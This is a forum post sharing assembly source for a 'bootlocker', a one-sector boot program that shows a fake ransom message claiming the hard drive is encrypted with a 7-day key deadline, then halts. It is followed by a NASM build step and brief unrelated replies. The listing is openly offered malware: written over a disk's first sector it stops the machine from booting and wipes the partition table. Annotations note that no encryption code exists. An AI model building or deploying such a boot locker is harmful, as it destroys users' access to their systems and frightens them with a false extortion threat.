Bootlocker source in asm.
; Boot-sector entry point: 16-bit code assembled for load address 0x7C00, where a
; BIOS places the first sector of the boot disk. It prints Msg and then spins
; forever.
; Defender note: nothing in this listing reads, writes or encrypts disk contents;
; the sector only displays text and hangs.
[BITS 16]
[ORG 0x7C00]
MOV SI, Msg
CALL OutStr
; Jump-to-self: halts progress after the message has been shown.
JMP $
; Prints the character in AL using BIOS video interrupt 0x10, function 0x0E
; (teletype output), with BH = page 0 and BL = colour attribute 7.
OutChar:
MOV AH, 0x0E
MOV BH, 0x00
MOV BL, 0x07
INT 0x10
RET
; Prints the zero-terminated string that SI points to, one character at a time
; through OutChar. SI is advanced past each character read.
OutStr:
next_char:
MOV AL, [SI]
INC SI
; OR AL, AL sets the zero flag when AL is 0, which marks the end of the string.
OR AL, AL
JZ exit_function
CALL OutChar
JMP next_char
exit_function:
RET
; Message text shown at boot; each line ends with the byte pair 0xA, 0xD and the
; string ends with a 0 byte.
; Defender note: the claims in this text (encryption, a 7-day key deadline) are
; not backed by any code in this listing.
Msg db 0xA, 0xD, 0xA, 0xD
db '########################################################', 0xA, 0xD
db '# Your harddrive is encrypted with military grade #', 0xA, 0xD
db '# encryption, you wont get your files back, since #', 0xA, 0xD
db '# the Cypher ransomware is still under construction #', 0xA, 0xD
db ' ', 0xA, 0xD
db '########################################################', 0xA, 0xD, 0xA, 0xD
db 'Unfortunately there are only 7 days left until the encryption key is destroyed.', 0xA, 0xD, 0xA, 0xD
db 'Have a nice day,', 0xA, 0xD
db ' The Cypher Project', 0
; Zero-fill up to byte 510, then append the 0xAA55 boot signature so the image is
; exactly one 512-byte sector.
; Recovery note: written over sector 0 of an MBR-partitioned disk, a full-sector
; image like this replaces the partition table as well as the boot code, so
; recovery means restoring sector 0 from backup or rebuilding the partition table.
TIMES 510 - ($ - $$) db 0
DW 0xAA55
Compile ASM with NASM to boot.bin
I think i did a pretty good job so far. -
2023-06-07 at 12:59 AM UTClet us
-
2023-06-07 at 2:24 AM UTCno you guys dont know shit all u gotta do is draw an ellipse and connect 2 pointz
-
2023-06-11 at 3:54 AM UTC
-
2023-06-11 at 4:41 AM UTC